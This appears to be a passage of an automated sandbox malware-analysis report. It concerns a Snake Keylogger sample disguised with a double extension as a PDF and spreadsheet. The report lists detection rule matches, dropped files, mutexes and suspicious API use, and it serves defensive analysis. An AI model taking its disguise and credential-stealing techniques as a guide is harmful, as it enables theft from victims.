                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A72B814_2_058A72B8
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A72C814_2_058A72C8
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AF2EF14_2_058AF2EF
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058AD2FF14_2_058AD2FF
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A22F014_2_058A22F0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A6A1814_2_058A6A18
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A1A4114_2_058A1A41
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A1A5014_2_058A1A50
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A4A6814_2_058A4A68
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 14_2_058A4A7814_2_058A4A78
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_0267D5DC16_2_0267D5DC
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_04E36FE816_2_04E36FE8
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_04E3004016_2_04E30040
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_04E3001F16_2_04E3001F
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_04E36FD816_2_04E36FD8
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_09267A0016_2_09267A00
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_09269A4816_2_09269A48
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_09269A5816_2_09269A58
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_0926719016_2_09267190
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_092690A816_2_092690A8
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_0926026816_2_09260268
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_0926027816_2_09260278
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_092675C816_2_092675C8
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_092607AF16_2_092607AF
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_092607C016_2_092607C0
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C3D27820_2_02C3D278
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C3536220_2_02C35362
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C3A08820_2_02C3A088
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C3C14720_2_02C3C147
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C3711820_2_02C37118
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C3C73820_2_02C3C738
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C3C46820_2_02C3C468
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C3CA0820_2_02C3CA08
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C369A020_2_02C369A0
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C3CFAA20_2_02C3CFAA
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C3CCD820_2_02C3CCD8
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C3EC1820_2_02C3EC18
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C3F7F120_2_02C3F7F1
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C33AC320_2_02C33AC3
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C33A2720_2_02C33A27
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C33B6720_2_02C33B67
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C33B0F20_2_02C33B0F
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C33E0920_2_02C33E09
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C3FC4F20_2_02C3FC4F
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C3EC0A20_2_02C3EC0A
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A79ED820_2_06A79ED8
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A797B020_2_06A797B0
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7228820_2_06A72288
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7529020_2_06A75290
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A71BA820_2_06A71BA8
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A70B3020_2_06A70B30
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7297020_2_06A72970
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7F62020_2_06A7F620
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A78E0820_2_06A78E08
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7F61020_2_06A7F610
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A79E7120_2_06A79E71
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7D7A820_2_06A7D7A8
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7D7B820_2_06A7D7B8
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7CF0820_2_06A7CF08
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7E4B220_2_06A7E4B2
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7E4C020_2_06A7E4C0
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7DC0120_2_06A7DC01
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7DC1020_2_06A7DC10
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7959020_2_06A79590
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A78DF920_2_06A78DF9
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7ED6020_2_06A7ED60
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7ED7020_2_06A7ED70
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7528020_2_06A75280
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7FA6A20_2_06A7FA6A
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7FA7820_2_06A7FA78
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7227820_2_06A72278
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A71B9720_2_06A71B97
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A70B2020_2_06A70B20
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7D36020_2_06A7D360
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7001320_2_06A70013
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7E06720_2_06A7E067
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7E06820_2_06A7E068
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7004020_2_06A70040
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7F1B920_2_06A7F1B9
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7F1C820_2_06A7F1C8
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7E91720_2_06A7E917
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7E91820_2_06A7E918
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7296220_2_06A72962
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1360405295.0000000002EE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000000.1303500210.0000000000982000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNRtD.exeH vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1358331293.00000000010BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1369980266.000000000A000000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3761158105.0000000000EF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000446000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exeBinary or memory string: OriginalFilenameNRtD.exeH vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 20.2.SOFcFE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 20.2.SOFcFE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000014.00000002.3760059045.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: SOFcFE.exe PID: 7664, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: SOFcFE.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, B----.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, B----.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, B----.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, B----.csCryptographic APIs: 'TransformFinalBlock'
                Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, B----.csCryptographic APIs: 'TransformFinalBlock'
                Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, B----.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, gCmqqu34SWaskVT2xX.csSecurity API names: _0020.SetAccessControl
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, gCmqqu34SWaskVT2xX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, gCmqqu34SWaskVT2xX.csSecurity API names: _0020.AddAccessRule
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, AkvZU4WDIaFkxJmh7r.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, AkvZU4WDIaFkxJmh7r.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, gCmqqu34SWaskVT2xX.csSecurity API names: _0020.SetAccessControl
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, gCmqqu34SWaskVT2xX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, gCmqqu34SWaskVT2xX.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/15@5/5
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeFile created: C:\Users\user\AppData\Roaming\SOFcFE.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5104:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4040:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmpF6B6.tmpJump to behavior
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000000.1303500210.0000000000982000.00000002.00000001.01000000.00000003.sdmp, SOFcFE.exe.1.drBinary or memory string: select * from [card] where [card].id = (select employees.[card] from employees where employees.id =quse employees; select [name] from department where id =
